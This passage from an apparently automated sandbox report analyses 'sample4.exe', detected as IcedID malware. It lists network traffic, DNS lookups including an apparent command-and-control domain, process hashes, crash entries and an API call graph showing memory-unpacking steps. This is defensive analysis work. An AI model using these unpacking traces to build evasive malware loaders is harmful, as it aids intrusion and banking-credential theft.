                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856594086 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856607914 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856618881 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856626987 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856647968 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856657028 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856669903 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856688023 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856697083 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856708050 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856726885 CET49761443192.168.2.3104.244.42.131
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856728077 CET44349761104.244.42.131192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.856775999 CET49761443192.168.2.3104.244.42.131

                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:42.073015928 CET6010053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:42.132333994 CET53601008.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:43.212511063 CET5319553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:43.268817902 CET53531958.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:44.586344004 CET5014153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:44.637275934 CET53501418.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:45.816457987 CET5302353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:45.874295950 CET53530238.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:46.975577116 CET4956353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:47.034167051 CET53495638.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:48.168927908 CET5135253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:48.216887951 CET53513528.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:49.390399933 CET5934953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:49.438287020 CET53593498.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:50.543476105 CET5708453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:50.591331959 CET53570848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:51.763727903 CET5882353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:51.811760902 CET53588238.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:53.013219118 CET5756853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:53.061137915 CET53575688.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:55.540607929 CET5054053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:55.599895954 CET53505408.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:56.658823967 CET5436653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:56.715101957 CET53543668.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:57.587508917 CET5303453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:02:57.635356903 CET53530348.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:13.865518093 CET5776253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:14.008744955 CET53577628.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:28.355820894 CET5543553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:28.413849115 CET53554358.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:28.958537102 CET5071353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:29.009180069 CET53507138.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:30.788479090 CET5613253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:30.849518061 CET53561328.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:40.658459902 CET5898753192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:40.716289997 CET53589878.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:50.941011906 CET5657953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:51.012018919 CET53565798.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:06.841526031 CET6063353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:06.899365902 CET53606338.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:07.443937063 CET6129253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:07.492047071 CET53612928.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:07.621474028 CET6361953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:07.670430899 CET53636198.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:11.022910118 CET6493853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:11.087511063 CET53649388.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:15.723376989 CET6194653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:15.792798996 CET53619468.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:17.913858891 CET6491053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:17.962712049 CET53649108.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:28.063801050 CET5212353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:28.114609957 CET53521238.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:39.059943914 CET5613053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:39.119180918 CET53561308.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:39.410049915 CET5633853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:39.468117952 CET53563388.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:44.425735950 CET5942053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:44.473823071 CET53594208.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:49.251020908 CET5878453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:49.298911095 CET53587848.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:52.946593046 CET6397853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:53.006309986 CET53639788.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:58.881520987 CET6293853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:58.943303108 CET53629388.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:59.224991083 CET5570853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:59.645874023 CET53557088.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:00.050563097 CET5680353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:00.277928114 CET53568038.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:05.585212946 CET5714553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:05.944235086 CET53571458.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:11.815483093 CET5535953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:11.878107071 CET53553598.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.850574970 CET5830653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.915168047 CET53583068.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:20.444683075 CET6412453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:20.492532015 CET53641248.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:20.922383070 CET4936153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:20.990811110 CET53493618.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:24.093696117 CET6315053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:24.167789936 CET53631508.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:31.951855898 CET5327953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:32.100008011 CET53532798.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:32.717174053 CET5688153192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:32.827061892 CET53568818.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:34.039890051 CET5364253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:34.096226931 CET53536428.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:34.543354034 CET5566753192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:34.602196932 CET53556678.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:35.091520071 CET5483353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:35.147965908 CET53548338.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:35.698450089 CET6247653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:35.754991055 CET53624768.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:36.282718897 CET4970553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:36.339052916 CET53497058.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:36.981055975 CET6147753192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:37.040271997 CET53614778.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:37.704214096 CET6163353192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:37.760768890 CET53616338.8.8.8192.168.2.3
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:38.128257990 CET5594953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:38.188183069 CET53559498.8.8.8192.168.2.3

                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:11.022910118 CET192.168.2.38.8.8.80x3dd2Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:39.410049915 CET192.168.2.38.8.8.80xc9dStandard query (0)support.oracle.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:52.946593046 CET192.168.2.38.8.8.80xb677Standard query (0)www.oracle.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:58.881520987 CET192.168.2.38.8.8.80x617fStandard query (0)www.intel.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:59.224991083 CET192.168.2.38.8.8.80xa65dStandard query (0)www.intel.chA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:00.050563097 CET192.168.2.38.8.8.80x23d9Standard query (0)corpredirect.intel.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:05.585212946 CET192.168.2.38.8.8.80x264bStandard query (0)gegemony4you.topA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.850574970 CET192.168.2.38.8.8.80x9598Standard query (0)help.twitter.comA (IP address)IN (0x0001)

                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                                              Jan 14, 2021 04:03:28.413849115 CET8.8.8.8192.168.2.30x99f8No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:06.899365902 CET8.8.8.8192.168.2.30x4b41No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:11.087511063 CET8.8.8.8192.168.2.30x3dd2No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:39.468117952 CET8.8.8.8192.168.2.30xc9dNo error (0)support.oracle.comsupport.oracle.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:53.006309986 CET8.8.8.8192.168.2.30xb677No error (0)www.oracle.comds-www.oracle.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:58.943303108 CET8.8.8.8192.168.2.30x617fNo error (0)www.intel.comintel11.cn.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:04:59.645874023 CET8.8.8.8192.168.2.30xa65dNo error (0)www.intel.chintel19233.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:00.277928114 CET8.8.8.8192.168.2.30x23d9No error (0)corpredirect.intel.comintel11.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:05.944235086 CET8.8.8.8192.168.2.30x264bName error (3)gegemony4you.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.915168047 CET8.8.8.8192.168.2.30x9598No error (0)help.twitter.coms.twitter.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.915168047 CET8.8.8.8192.168.2.30x9598No error (0)s.twitter.com104.244.42.131A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.915168047 CET8.8.8.8192.168.2.30x9598No error (0)s.twitter.com104.244.42.3A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.915168047 CET8.8.8.8192.168.2.30x9598No error (0)s.twitter.com104.244.42.195A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:17.915168047 CET8.8.8.8192.168.2.30x9598No error (0)s.twitter.com104.244.42.67A (IP address)IN (0x0001)

                                                                                                                                                                                                                                                              HTTPS Packets

                                                                                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                                              Jan 14, 2021 04:05:18.012618065 CET104.244.42.131443192.168.2.349761CN=*.twitter.com, OU=fra2, O="Twitter, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Mar 05 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013Tue Mar 02 13:00:00 CET 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                                                                                                                              CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028

                                                                                                                                                                                                                                                              Code Manipulations

                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Start time:04:02:46
                                                                                                                                                                                                                                                              Start date:14/01/2021
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\sample4.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:'C:\Users\user\Desktop\sample4.exe'
                                                                                                                                                                                                                                                              Imagebase:0xd0000
                                                                                                                                                                                                                                                              File size:2136576 bytes
                                                                                                                                                                                                                                                              MD5 hash:5009B8BCF024704C8B23E42C492F118C
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_IcedID_3, Description: Yara detected IcedID, Source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Start time:04:04:00
                                                                                                                                                                                                                                                              Start date:14/01/2021
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 768
                                                                                                                                                                                                                                                              Imagebase:0x9e0000
                                                                                                                                                                                                                                                              File size:434592 bytes
                                                                                                                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Start time:04:04:08
                                                                                                                                                                                                                                                              Start date:14/01/2021
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 804
                                                                                                                                                                                                                                                              Imagebase:0x9e0000
                                                                                                                                                                                                                                                              File size:434592 bytes
                                                                                                                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Start time:04:04:19
                                                                                                                                                                                                                                                              Start date:14/01/2021
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 896
                                                                                                                                                                                                                                                              Imagebase:0x9e0000
                                                                                                                                                                                                                                                              File size:434592 bytes
                                                                                                                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Start time:04:04:29
                                                                                                                                                                                                                                                              Start date:14/01/2021
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 924
                                                                                                                                                                                                                                                              Imagebase:0x9e0000
                                                                                                                                                                                                                                                              File size:434592 bytes
                                                                                                                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Start time:04:04:40
                                                                                                                                                                                                                                                              Start date:14/01/2021
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 1224
                                                                                                                                                                                                                                                              Imagebase:0x9e0000
                                                                                                                                                                                                                                                              File size:434592 bytes
                                                                                                                                                                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:4.9%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:16.9%
                                                                                                                                                                                                                                                                Signature Coverage:8.4%
                                                                                                                                                                                                                                                                Total number of Nodes:714
                                                                                                                                                                                                                                                                Total number of Limit Nodes:48

                                                                                                                                                                                                                                                                Graph

                                                                                                                                                                                                                                                                execution_graph 26810 11b813 RegCloseKey RegCreateKeyExW GetModuleHandleW GetProcAddress RegCreateKeyExW 26811 135c17 290 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26812 12bc17 143 API calls 2 library calls 26813 126814 10 API calls DloadLock 26814 12b818 64 API calls 26965 137619 49 API calls 26815 128019 Escape 26816 120019 63 API calls 26427 118c1c 26428 118c28 __EH_prolog3 26427->26428 26430 118c6d 26428->26430 26438 118a16 RtlEnterCriticalSection 26428->26438 26455 118704 48 API calls 2 library calls 26428->26455 26456 11890b TlsAlloc RtlInitializeCriticalSection RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 26428->26456 26457 118cbe RtlEnterCriticalSection TlsGetValue RtlLeaveCriticalSection RtlLeaveCriticalSection 26430->26457 26432 118c7a 26435 118c9b Concurrency::details::ExternalContextBase::~ExternalContextBase 26432->26435 26436 118c80 26432->26436 26458 118d79 48 API calls 3 library calls 26436->26458 26443 118a33 26438->26443 26439 118adc _memcpy_s 26440 118af6 RtlLeaveCriticalSection 26439->26440 26440->26428 26441 118a83 GlobalHandle GlobalUnWire 26445 1188e3 Concurrency::details::ExternalContextBase::~ExternalContextBase 24 API calls 26441->26445 26442 118a6e 26459 1188e3 26442->26459 26443->26439 26443->26441 26443->26442 26447 118aa4 GlobalReAlloc 26445->26447 26448 118ab1 26447->26448 26449 118ab5 26448->26449 26450 118abc GlobalFix 26448->26450 26451 118b23 RtlLeaveCriticalSection 26449->26451 26453 118b13 GlobalHandle GlobalFix 26449->26453 26450->26439 26464 11871e RaiseException __CxxThrowException@8 26451->26464 26453->26451 26455->26428 26456->26428 26457->26432 26458->26435 26460 1188f6 Concurrency::details::ExternalContextBase::~ExternalContextBase 26459->26460 26461 1188fd GlobalAlloc 26460->26461 26465 118b30 24 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26460->26465 26461->26448 26817 12281c SetScrollRange 26818 263c28 RtlLeaveCriticalSection __onexit 26966 12be03 90 API calls 3 library calls 26968 12ae07 FindResourceW LoadResource LockResource FreeResource 26820 125408 72 API calls 26969 129a09 114 API calls 26970 126633 62 API calls 2 library calls 26971 136637 314 API calls 26823 138c35 25 API calls 26824 128035 ExcludeClipRect ExcludeClipRect 26825 137434 52 API calls 26826 12c83a 56 API calls 26827 137c39 49 API calls 26972 13a63f 54 API calls 26828 11f43f 109 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26974 12823d OffsetViewportOrgEx OffsetViewportOrgEx 26975 13023c MapWindowPoints 26829 130821 71 API calls 26830 127021 113 API calls 26976 138627 5 API calls DloadLock 26831 133825 152 API calls 26978 12ca24 86 API calls DloadLock 26979 119226 LocalFree RtlEnterCriticalSection RtlLeaveCriticalSection 26980 119a2d 58 API calls _wcschr 26832 13b02d 52 API calls 26833 12fc2c 68 API calls _memcpy_s 26981 12de2c 100 API calls DloadLock 26834 257465 42 API calls 26835 120853 50 API calls 26983 137254 55 API calls 26328 28f660 26330 28f67b 26328->26330 26331 28f68d 26330->26331 26333 28fb73 26331->26333 26334 28fbb8 26333->26334 26335 28fbe6 GetPEB 26334->26335 26337 28fbde 26334->26337 26335->26337 26336 28fc6b VirtualAlloc 26339 28fcb1 26336->26339 26337->26336 26338 28fc33 VirtualAlloc 26337->26338 26338->26336 26340 28fcca VirtualAlloc 26339->26340 26353 28f8b4 26340->26353 26342 28fd03 VirtualFree 26343 28fd33 26342->26343 26344 28fe13 VirtualProtect 26343->26344 26345 28fe32 26344->26345 26348 28fe65 26344->26348 26346 28fe40 VirtualProtect 26345->26346 26345->26348 26346->26345 26347 28feee VirtualProtect 26349 28ff29 VirtualProtect 26347->26349 26348->26347 26351 28ff86 VirtualFree GetPEB 26349->26351 26352 28ffba 26351->26352 26353->26342 26984 119259 49 API calls 26985 12865b SetMapMode SetMapMode 26836 12945f LocalFree FreeLibrary FreeLibrary 26986 13025c MoveWindow 26838 12f440 60 API calls 26839 134c41 InvalidateRect UpdateWindow 26840 11e442 93 API calls 2 library calls 26841 12cc46 53 API calls 26987 11e645 73 API calls 26988 128648 SetLayout 26842 13084d GetCurrentThreadId SetWindowsHookExW UnhookWindowsHookEx 26843 13684c 15 API calls 26844 136872 177 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26989 11a272 60 API calls 26990 120676 49 API calls 26845 122874 SetWindowPlacement 26848 12807b ExtTextOutW 26849 128879 TabbedTextOutW 26850 134c78 306 API calls 26851 135c78 66 API calls 26852 120c7d 67 API calls 3 library calls 26991 13667c 54 API calls 26853 11ac61 MultiByteToWideChar 26992 134263 49 API calls 26250 25b054 26251 25b061 _memcpy_s 26250->26251 26252 25b0a1 26251->26252 26253 25b08c RtlAllocateHeap 26251->26253 26257 261349 RtlEnterCriticalSection RtlLeaveCriticalSection _memcpy_s 26251->26257 26258 24f9ad 14 API calls _memcpy_s 26252->26258 26253->26251 26254 25b09f 26253->26254 26257->26251 26258->26254 26993 11ba60 41 API calls __vswprintf_c_l 26854 118862 74 API calls DloadLock 26855 139067 GetStringTypeW 26856 120467 54 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26994 12a265 298 API calls 26995 12226b 68 API calls DloadLock 26857 126c68 15 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 26996 